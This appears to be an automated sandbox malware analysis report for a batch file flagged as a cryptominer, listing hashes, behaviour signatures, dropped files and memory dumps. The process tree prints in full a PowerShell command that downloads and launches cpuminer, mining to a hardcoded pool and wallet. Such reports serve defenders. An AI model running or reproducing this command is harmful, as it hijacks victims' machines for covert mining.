f1afc81fa5c304ba261d76f1941e54ebe25a3a7651b0a45e646183382ec03bc4

Analysis

max time kernel
1793s
max time network
1795s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
03/02/2024, 05:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

508B
MD5

d9af861fbfd5f212c2db65e7ed0cd376
SHA1

f9316adde0463e645cc0624f645faad3b972320a
SHA256

f1afc81fa5c304ba261d76f1941e54ebe25a3a7651b0a45e646183382ec03bc4
SHA512

92eb6c1e2a0e1cf196c97c9e9a9f3c53967f9ae58a2b675ce18e967b0e414e6b17ade6e914e96817df1878bbe11022b4737bae0d4078a257de9a132eb1a91536

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1140	powershell.exe
10	1140	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2052	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2052	cpuminer-sse2.exe
2052	cpuminer-sse2.exe
2052	cpuminer-sse2.exe
2052	cpuminer-sse2.exe
2052	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1140	powershell.exe
1140	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1140	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 384 wrote to memory of 1140	384	cmd.exe	88
PID 384 wrote to memory of 1140	384	cmd.exe	88
PID 1140 wrote to memory of 4812	1140	powershell.exe	97
PID 1140 wrote to memory of 4812	1140	powershell.exe	97
PID 4812 wrote to memory of 2052	4812	cmd.exe	98
PID 4812 wrote to memory of 2052	4812	cmd.exe	98

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1140
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4812
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2052

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fcowb0nl.4kb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.4MB

MD5
619bbdc798a66a4f3b9021dae587e2b1

SHA1
e3c54103573086a4fefff402182e809912cac8b6

SHA256
9c3ba7c803add9f50ea79ef8f8b5969e55c0116310e19361451196687a49ab1a

SHA512
a1f965eb95fe2bb9f0715bd1e7f1095ce3d110586c6f274235d1e33267265e342e107ec3a8f123317f71b3bc6f82551779391bef766e7de434d6febe76030ab4

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
826KB

MD5
8aef29f4f2a9eff36a76b8c233c4e8e5

SHA1
c93db746473560b36400382d5eea30ff885515e7

SHA256
d08d3c198dbe1f3555fb8f15672f87f1766860ad19063b35973a6b278ca4bed2

SHA512
8dbdac45e542156a9be22740ad9d7359e3b891f69a310ff36297c6ddde519ffaeb098a6996ce68d9ce7937a11d3831d0aecac07cd300240d5f199e9718edc4ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
807KB

MD5
e28bf496b3a30721e382ac6c69f9fca1

SHA1
e3512137d7c87bc313b985aff193afa408e506b2

SHA256
ccf72cf718efeb2559826c881ae561ff6483a05d472337579ada7f4bf8843dc7

SHA512
05d7b4735ede0e291d6fc10dc2fa67f4be33187035746081f07ccf28ba6bb3a0b71b4f05321d11b30597bf450391d5995a703c75c027940db2dba074d5435484

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
1.0MB

MD5
54d00ca0ddae74f91e1a156f268b5193

SHA1
4bb90cc499708d26ceff55359e11d5763f023b6a

SHA256
12b897cd7cfd625ccf0c1ed58e2fab739185533807eb0464297462764f8694eb

SHA512
fc7ee1e029c7022f7a013217536dc2afd14abb1c1231328df39e9b249b4986e9a4bfcff50b439792acd12967d8df5d2b050b1d3e075ff363f20c698648c8cfe5

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.1MB

MD5
868f7c1efc5032332611a102f35d41a4

SHA1
f84974cffe56f7963db9734817ea39684791f1c5

SHA256
908893dc004e3ff38adf82813e26089f4e86c7e30fbd75679c45020228013870

SHA512
62bb1b57c624ea0e0fe42c7150a6307f57ca0b1dd21bb7f41e66d2b0dcdc57ca60fb87efd8fdaf66c46109251393ebca2ff32f5c853ee3960f3c05cd9d8a00f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.2MB

MD5
28dc2d5e48caa18f190a135e1930611d

SHA1
c7d3af0d0b9556cffa611c125adb692856f01d1e

SHA256
9905cedd5c25e614aa12967a206e19ae928f6564d9ccb1d57995738bf2f30017

SHA512
a34f1ad7eea4574fc4de9adc205f6d14c2e39496e7eda43233008ff820e268421447b5a0b27ec5c9068ff095d0a4fa510da9b5084570b1b0622fe5628f559fd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.2MB

MD5
a22efdb6bfcd8e0f25ce759887171437

SHA1
3f0edc7b0a3f604570e73c907d29a4e5bf6a0b0d

SHA256
fac27cb5720dd923c943965e369bd6a4037a605c931fb33295a637853a72eac5

SHA512
d7865b42ea38186b6cbbe4c4f1d92e24d47426d2212773dcf678d73b45d158f92f9405817234a9b6886617d48d1639b62c54d4695de564f5579ca3df9ab21224

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1140-18-0x000001D07DB00000-0x000001D07DB0A000-memory.dmp

Filesize
40KB

Download
memory/1140-56-0x00007FFFE89F0000-0x00007FFFE94B1000-memory.dmp

Filesize
10.8MB

Download
memory/1140-17-0x000001D07DD80000-0x000001D07DD92000-memory.dmp

Filesize
72KB

Download
memory/1140-16-0x000001D065180000-0x000001D065190000-memory.dmp

Filesize
64KB

Download
memory/1140-14-0x000001D065180000-0x000001D065190000-memory.dmp

Filesize
64KB

Download
memory/1140-13-0x00007FFFE89F0000-0x00007FFFE94B1000-memory.dmp

Filesize
10.8MB

Download
memory/1140-9-0x000001D07D970000-0x000001D07D992000-memory.dmp

Filesize
136KB

Download
memory/1140-12-0x000001D065180000-0x000001D065190000-memory.dmp

Filesize
64KB

Download
memory/1140-10-0x00007FFFE89F0000-0x00007FFFE94B1000-memory.dmp

Filesize
10.8MB

Download
memory/1140-11-0x000001D065180000-0x000001D065190000-memory.dmp

Filesize
64KB

Download
memory/2052-72-0x00000000714C0000-0x0000000071558000-memory.dmp

Filesize
608KB

Download
memory/2052-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2052-71-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2052-73-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2052-70-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2052-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2052-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2052-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2052-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2052-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2052-109-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2052-114-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2052-119-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2052-129-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download